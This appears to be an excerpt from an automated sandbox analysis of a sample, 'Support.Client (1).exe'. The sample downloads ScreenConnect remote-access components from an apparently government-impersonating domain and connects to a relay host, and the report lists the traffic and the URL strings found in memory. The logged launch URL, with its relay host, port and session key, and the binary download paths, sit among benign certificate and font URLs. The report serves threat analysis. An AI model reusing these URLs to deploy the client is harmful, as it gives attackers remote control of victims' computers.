Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip

Source: global traffic	DNS traffic detected: DNS query: cloud-ssagov.icu
Source: global traffic	DNS traffic detected: DNS query: api.wisescreen.net
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Support.Client (1).exe, 00000000.00000002.2520570572.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeSta
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: F2E248BEDDBB2D85122423C41028BFD40.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000002.00000002.3289991348.00000224B668F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: Support.Client (1).exe, 00000000.00000002.2520570572.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.c
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 00000002.00000003.1657089633.00000224B64D8000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000002.00000003.1657089633.00000224B64D8000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000002.00000003.1657089633.00000224B64D8000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000002.00000003.1657089633.00000224B650D000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.2.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA02DA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert
Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141.1.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA1E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA2AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: dfsvc.exe, 00000001.00000002.3505558952.000001EC9FD31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3505601572.00000000015B1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2894133080.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.12.dr	String found in binary or memory: http://upx.sf.net
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0197000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA01FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA009A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0174000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1943439615.000000001BB6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: dfsvc.exe, 00000001.00000002.3505558952.000001EC9FDBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 00000001.00000002.3505558952.000001EC9FDBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA027B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA04B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001EC9FD31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu
Source: dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/Scr2%
Source: dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/Scre
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA04B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Cli
Source: dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA009A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3503405101.000001EC9E331000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1935051701.000000000325F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1933774164.000000000148F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1935051701.0000000003251000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1934240653.0000000001543000.00000004.00000020.00020000.00000000.sdmp, 86VMVS2K.log.1.dr	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicatio
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1934162855.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1943242866.000000001BB26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application%%%
Source: dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application01(
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application1934e089
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application4e089
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application5-21
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1933774164.000000000148F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application561934e089
Source: 86VMVS2K.log.1.dr	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationL1LKA
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationL37L
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationScreenConnect.
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1935051701.000000000325F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationX
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1933774164.000000000148F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationXN
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicatione089
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationgV
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1943332035.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationh
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationh9S
Source: dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationil
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationil.37L
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3530611036.000001ECBA351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll0h&
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1935051701.000000000325F000.00000004.00000800.00020000.00000000.sdmp, 86VMVS2K.log.1.dr	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA027B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientServi
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dllh~2e
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dlllA6d
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA02F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exegA/d
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA04B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllv
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Win
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA02F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShe0
